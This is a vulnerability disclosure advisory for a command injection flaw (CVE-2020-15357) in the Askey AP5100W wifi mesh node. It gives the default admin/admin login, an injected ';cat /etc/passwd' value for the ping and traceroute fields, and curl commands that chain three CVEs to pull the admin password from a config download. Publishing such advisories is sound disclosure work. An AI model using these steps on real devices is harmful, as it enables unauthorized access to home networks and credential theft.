Advisories

Askey AP5100W Authenticated Command Injection in web Interface

CVE ID

CVE-2020-15357

Tested Versions

  • Askey AP5100W version Dual_SIG_1.01.071

Product URL(s)

  • https://www.askey.com.tw/

Askey AP5100W was a wifi mesh node provided to Singtel customers as part of their Fibre Broadband contract package. It is used to provide greater WiFi coverage in homes or offices.

The wifi mesh node comes with a configurable web interface that allows users to modify settings on their mesh nodes and run diagnostics.

Vulnerability

The default login credential of the web interface for the Askey AP5100W is as follows:

  • Login Name: admin
  • Password: admin

A user is able to perform network diagnostics on the wifi mesh node post authentication by clicking tools > Network Analysis. A user has a choice of testing using ping, traceroute, or route. For ping and traceroute, the user input is not sanitised and a trivial command injection can be performed by appending ;cat /etc/passwd to the commands.

How to exploit

An attacker could combine all the 3 vulnerabilities (CVE-2020-15357, CVE-2020-25545, CVE-2020-25546), an attacker who is on the network, regardless of guest access or adjacent network, as long as he is able to reach the web interface, he can set up a script to constantly call

curl http://192.168.1.7/status.cgi?_=1590132976934&nvget=sysinfo

to check if anyone has logged into the web interface.

As soon as the response is not {"login":"0"}, run the following command to obtain the admin login password for the web interface.

curl 'http://IP_ADDR_OF_WEB_INTERFACE/setup/toolsConfigDownload.htm?_=1590131613045' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://IP_ADDR_OF_WEB_INTERFACE/'

curl http://IP_ADDR_OF_WEB_INTERFACE/configs/config.tar | grep gui_pwd

Once in web interface, click tools > Network Analysis and choose either ping or traceroute to inject commands with ;cat /etc/passwd

Vendor Response

The vendor didn’t replied to us despite all the efforts we made.

Timeline

  • 2020-05-22 Reported to Askey, no reply from Askey
  • 2020-05-28 Reported to Askey again, no reply from Askey
  • 2020-06-03 Reported to CSA, CSA replied on same day saying that they will inform Askey and SingTel
  • 2020-06-09 Email to CSA again, CSA replied that SingTel and Askey didn't get back to them.
  • 2020-06-09 Reported to Mitre, but no reply
  • 2020-07-14 Reported to Mitre again, but no reply again.
  • 2020-09-15 Mitre finally replied with CVE

Credit

Discovered by Li Bailin